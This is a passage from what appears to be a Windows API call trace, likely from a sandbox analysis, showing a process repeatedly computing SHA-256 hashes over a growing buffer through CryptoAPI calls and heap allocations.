	[0154.883] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0154.883] CryptHashData (hHash=0x22b6840, pbData=0x2731588, dwDataLen=0x140, dwFlags=0x0) returned 1
	[0154.883] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0154.883] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x230da00
	[0154.883] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x230da00, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x230da00, pdwDataLen=0x128aac) returned 1
	[0154.883] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0154.883] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0154.883] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0154.884] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0154.884] CryptHashData (hHash=0x22b68c0, pbData=0x2731588, dwDataLen=0x160, dwFlags=0x0) returned 1
	[0154.884] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0154.884] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x230da28
	[0154.884] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x230da28, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x230da28, pdwDataLen=0x128aac) returned 1
	[0154.884] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0154.884] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0154.884] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0154.884] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0154.884] CryptHashData (hHash=0x22b6840, pbData=0x2731588, dwDataLen=0x180, dwFlags=0x0) returned 1
	[0154.884] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0154.884] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x230da50
	[0154.884] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x230da50, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x230da50, pdwDataLen=0x128aac) returned 1
	[0154.884] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0154.884] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0154.884] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0154.885] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0154.885] CryptHashData (hHash=0x22b68c0, pbData=0x2731588, dwDataLen=0x1a0, dwFlags=0x0) returned 1
	[0154.885] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0154.885] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x230da78
	[0154.885] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x230da78, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x230da78, pdwDataLen=0x128aac) returned 1
	[0154.885] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0154.885] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0154.885] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0154.885] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0154.885] CryptHashData (hHash=0x22b6840, pbData=0x2731588, dwDataLen=0x1c0, dwFlags=0x0) returned 1
	[0154.885] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0154.885] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x230daa0
	[0154.885] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x230daa0, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x230daa0, pdwDataLen=0x128aac) returned 1
	[0154.885] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0154.885] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0154.885] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0154.886] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0154.886] CryptHashData (hHash=0x22b68c0, pbData=0x2731588, dwDataLen=0x1e0, dwFlags=0x0) returned 1
	[0154.886] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0154.886] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x230dac8
	[0154.886] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x230dac8, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x230dac8, pdwDataLen=0x128aac) returned 1
	[0154.886] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0154.886] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0154.886] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0154.886] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0154.886] CryptHashData (hHash=0x22b6840, pbData=0x2731588, dwDataLen=0x200, dwFlags=0x0) returned 1
	[0154.886] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0154.886] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x230daf0
	[0154.886] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x230daf0, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x230daf0, pdwDataLen=0x128aac) returned 1
	[0154.886] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0154.886] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0154.886] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0154.887] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0154.887] CryptHashData (hHash=0x22b68c0, pbData=0x2731588, dwDataLen=0x220, dwFlags=0x0) returned 1
	[0154.887] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0154.887] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x230db18
	[0154.887] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x230db18, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x230db18, pdwDataLen=0x128aac) returned 1
	[0154.887] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0154.887] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0154.887] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0154.887] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0154.887] CryptHashData (hHash=0x22b6840, pbData=0x2731588, dwDataLen=0x240, dwFlags=0x0) returned 1
	[0154.887] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0154.887] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x230db40
	[0154.887] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x230db40, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x230db40, pdwDataLen=0x128aac) returned 1
	[0154.887] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0154.887] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0154.887] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0154.888] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0154.888] CryptHashData (hHash=0x22b68c0, pbData=0x2731588, dwDataLen=0x260, dwFlags=0x0) returned 1
	[0154.888] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0154.888] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x230db68
	[0154.888] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x230db68, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x230db68, pdwDataLen=0x128aac) returned 1
	[0154.888] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0154.888] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0154.888] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0154.888] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0154.888] CryptHashData (hHash=0x22b6840, pbData=0x2731588, dwDataLen=0x280, dwFlags=0x0) returned 1
	[0154.888] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0154.888] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x230db90
	[0154.888] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x230db90, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x230db90, pdwDataLen=0x128aac) returned 1
	[0154.888] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0154.888] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0154.888] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0154.889] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0154.889] CryptHashData (hHash=0x22b68c0, pbData=0x2731588, dwDataLen=0x2a0, dwFlags=0x0) returned 1
	[0154.889] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0154.889] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x230dbb8
	[0154.889] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x230dbb8, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x230dbb8, pdwDataLen=0x128aac) returned 1
	[0154.889] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0154.889] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0154.889] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0154.889] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0154.889] CryptHashData (hHash=0x22b6840, pbData=0x2731588, dwDataLen=0x2c0, dwFlags=0x0) returned 1
	[0154.889] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0154.889] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x230dbe0
	[0154.889] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x230dbe0, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x230dbe0, pdwDataLen=0x128aac) returned 1
	[0154.889] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0154.889] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0154.889] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0154.890] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0154.890] CryptHashData (hHash=0x22b68c0, pbData=0x2731588, dwDataLen=0x2e0, dwFlags=0x0) returned 1
	[0154.890] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0154.890] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x230dc08
	[0154.890] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x230dc08, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x230dc08, pdwDataLen=0x128aac) returned 1
	[0154.890] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0154.890] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0154.890] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0154.890] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0154.890] CryptHashData (hHash=0x22b6840, pbData=0x2731588, dwDataLen=0x300, dwFlags=0x0) returned 1
	[0154.890] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0154.890] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x230dc30
	[0154.890] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x230dc30, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x230dc30, pdwDataLen=0x128aac) returned 1
	[0154.890] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0154.890] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0154.890] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0154.891] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0154.891] CryptHashData (hHash=0x22b68c0, pbData=0x2731588, dwDataLen=0x320, dwFlags=0x0) returned 1
	[0154.891] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0154.891] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x230dc58
	[0154.891] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x230dc58, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x230dc58, pdwDataLen=0x128aac) returned 1
	[0154.891] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0154.891] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0154.891] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0154.891] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0154.891] CryptHashData (hHash=0x22b6840, pbData=0x2731588, dwDataLen=0x340, dwFlags=0x0) returned 1
	[0154.891] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0154.891] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x230dc80
	[0154.891] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x230dc80, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x230dc80, pdwDataLen=0x128aac) returned 1
	[0154.891] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0154.891] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0154.891] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0154.892] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0154.892] CryptHashData (hHash=0x22b68c0, pbData=0x2731588, dwDataLen=0x360, dwFlags=0x0) returned 1
	[0154.892] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0154.892] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x230dca8
	[0154.892] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x230dca8, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x230dca8, pdwDataLen=0x128aac) returned 1
	[0154.892] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0154.892] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0154.892] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0154.892] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0154.892] CryptHashData (hHash=0x22b6840, pbData=0x2731588, dwDataLen=0x380, dwFlags=0x0) returned 1
	[0154.892] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0154.892] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x230dcd0
	[0154.892] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x230dcd0, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x230dcd0, pdwDataLen=0x128aac) returned 1
	[0154.892] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0154.892] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0154.892] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0154.893] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0154.893] CryptHashData (hHash=0x22b68c0, pbData=0x2731588, dwDataLen=0x3a0, dwFlags=0x0) returned 1
	[0154.893] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0154.893] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x230dcf8
	[0154.893] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x230dcf8, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x230dcf8, pdwDataLen=0x128aac) returned 1
	[0154.893] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0154.893] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0154.893] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0154.894] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0154.894] CryptHashData (hHash=0x22b6840, pbData=0x2731588, dwDataLen=0x3c0, dwFlags=0x0) returned 1
	[0154.894] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0154.894] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x230dd20
	[0154.894] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x230dd20, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x230dd20, pdwDataLen=0x128aac) returned 1
	[0154.894] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0154.894] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0154.894] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0154.894] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0154.894] CryptHashData (hHash=0x22b68c0, pbData=0x2731588, dwDataLen=0x3e0, dwFlags=0x0) returned 1
	[0154.894] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0154.894] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x230dd48
	[0154.894] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x230dd48, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x230dd48, pdwDataLen=0x128aac) returned 1
	[0154.894] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0154.894] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0154.894] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0154.895] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0154.895] CryptHashData (hHash=0x22b6840, pbData=0x2731588, dwDataLen=0x400, dwFlags=0x0) returned 1
	[0154.895] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0154.895] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x230dd70
	[0154.895] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x230dd70, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x230dd70, pdwDataLen=0x128aac) returned 1
	[0154.895] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0154.895] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0154.895] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0154.895] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0154.895] CryptHashData (hHash=0x22b68c0, pbData=0x2731588, dwDataLen=0x420, dwFlags=0x0) returned 1
	[0154.895] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0154.895] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x230dd98
	[0154.895] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x230dd98, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x230dd98, pdwDataLen=0x128aac) returned 1
	[0154.895] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0154.895] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0154.895] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0154.896] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0154.896] CryptHashData (hHash=0x22b6840, pbData=0x2731588, dwDataLen=0x440, dwFlags=0x0) returned 1
	[0154.896] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0154.896] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x230ddc0
	[0154.896] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x230ddc0, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x230ddc0, pdwDataLen=0x128aac) returned 1
	[0154.896] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0154.896] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0154.896] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0154.896] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0154.896] CryptHashData (hHash=0x22b68c0, pbData=0x2731588, dwDataLen=0x460, dwFlags=0x0) returned 1
	[0154.896] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
